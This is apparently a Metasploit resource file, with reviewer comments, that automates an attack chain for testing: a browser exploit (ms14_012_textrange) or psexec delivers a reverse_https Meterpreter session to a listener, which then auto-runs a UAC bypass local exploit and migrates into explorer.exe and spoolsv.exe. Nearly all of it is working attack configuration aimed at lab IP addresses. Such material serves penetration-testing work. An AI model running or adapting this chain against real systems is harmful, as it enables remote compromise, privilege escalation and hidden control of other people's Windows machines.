
First attempt at a resource file for automating testing of auto_run_local_exploits.


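# 0) setup our variables
#
# NOTE(review): msfconsole renders this file through ERB *before* it parses the
# console commands, so every <% %> tag is evaluated even on a line that starts
# with '#'. A leading '#' only comments out the rendered msfconsole line; to
# disable a Ruby assignment use an ERB comment tag, <%# ... %>. The "commented"
# assignments below have been converted accordingly.
<% rc_primary_lhost = "192.168.130.1" %>
<% rc_lhost_for_local = rc_primary_lhost %>

<% rc_primary_lport = "4433" %>
<% rc_lport_for_local = "4443" %>

## primary exploit options
<%# rc_primary_exploit = "exploit/windows/smb/psexec" %>
<% rc_primary_exploit = "exploit/windows/browser/ms14_012_textrange" %>
## target host, shared by every branch below (was repeated per branch)
<% rc_primary_rhost = "192.168.130.166" %>
<% if rc_primary_exploit =~ /\/browser\// %>
  # browser exploit
  # (RHOST is kept as before; a browser module serves from SRVHOST/SRVPORT and
  # may simply ignore it -- confirm against the module's options)
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", rc_primary_rhost], ["LPORT", rc_primary_lport]] %>
<% elsif rc_primary_exploit =~ /\/psexec/ %>
  # psexec exploit
  # SMB credentials are read from the environment instead of being written into
  # a file that gets committed or shared. The variable names RC_SMB_DOMAIN /
  # RC_SMB_USER / RC_SMB_PASS are chosen here; export them before loading this
  # resource file. ENV.fetch raises KeyError when user/pass are unset, which is
  # preferable to silently running psexec with an empty credential. Any
  # credential that was previously written literally into this file should be
  # treated as exposed and rotated.
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", rc_primary_rhost], ["LPORT", rc_primary_lport], ["SMBDomain", ENV.fetch("RC_SMB_DOMAIN", ".")], ["SMBUser", ENV.fetch("RC_SMB_USER")], ["SMBPass", ENV.fetch("RC_SMB_PASS")]] %>
<% else %>
  # other exploit
  <% rc_primary_exploit_options = [["LHOST", rc_primary_lhost], ["RHOST", rc_primary_rhost], ["LPORT", rc_primary_lport]] %>
<% end %>

# ["SRVHOST", rc_primary_lhost]
<% rc_exploit_for_local = "exploit/windows/local/bypassuac_injection" %>

<% rc_primary_payload = "windows/meterpreter/reverse_https" %>
<% rc_payload_for_local = rc_primary_payload %>

<% rc_primary_initial_script = "migrate -n explorer.exe" %>
<% rc_disable_handler_for_local = "false" %>
# Options handed to the local exploit when it is run as the primary session's
# AutoRunScript. Two fixes relative to the first version:
#  - DisablePayloadHandler is now interpolated; previously the string carried the
#    literal text "rc_disable_handler_for_local" instead of its value.
#  - LHOST is passed explicitly (rc_lhost_for_local was defined but never used);
#    the handler's LHOST was only `set` on the handler module, so relying on the
#    local exploit inheriting it is an assumption -- TODO confirm, but explicit
#    is safe either way.
<% rc_primary_auto_run_script = "#{rc_exploit_for_local} LHOST=#{rc_lhost_for_local} LPORT=#{rc_lport_for_local} DisablePayloadHandler=#{rc_disable_handler_for_local}" %>
<% rc_auto_run_script_for_local = "migrate -n spoolsv.exe" %>

# 1) prep for primary exploit
# No module is active yet at this point; presumably `set` falls back to the
# global datastore here -- verify, or use `setg` if VERBOSE must apply to every
# module loaded below.
set VERBOSE true
## handler
use exploit/multi/handler
set PAYLOAD <%= rc_primary_payload %>
set LHOST <%= rc_primary_lhost %>
set LPORT <%= rc_primary_lport %>
set ExitOnSession false
set InitialAutoRunScript <%= rc_primary_initial_script %>
set AutoRunScript <%= rc_primary_auto_run_script %>
exploit -j -z

# 2) prep for secondary exploit
# These `set`s still target exploit/multi/handler (the active module). Whether
# the job started above sees them depends on whether `exploit -j` runs on a copy
# of the module's datastore -- assumed to be a copy here; confirm before relying
# on the ordering.
set AutoRunScript <%= rc_auto_run_script_for_local %>
unset InitialAutoRunScript
## setup secondary handler for local exploit if DisablePayloadHandler
# NOTE(review): with `exploit -j -z` left commented out, selecting
# rc_disable_handler_for_local = "true" configures this handler but never starts
# it, so the local exploit's callback would have no listener. Uncomment it (or
# start the handler by hand) when that mode is exercised.
<% if rc_disable_handler_for_local.downcase == "true" %>
  set PAYLOAD <%= rc_payload_for_local %>
  set LPORT <%= rc_lport_for_local %>
  #exploit -j -z
<% end %>

# 3) run primary exploit to get an initial session
use <%= rc_primary_exploit %>
set PAYLOAD <%= rc_primary_payload %>
# one `set KEY VALUE` line per option pair collected in step 0
<% rc_primary_exploit_options.each do |opt_arr| %>
  set <%= opt_arr.join(' ') %>
<% end %>

# always DisablePayloadHandler for the primary (for testing at least)
set DisablePayloadHandler true
# left commented on purpose: the primary exploit is launched manually during testing
#exploit -j -z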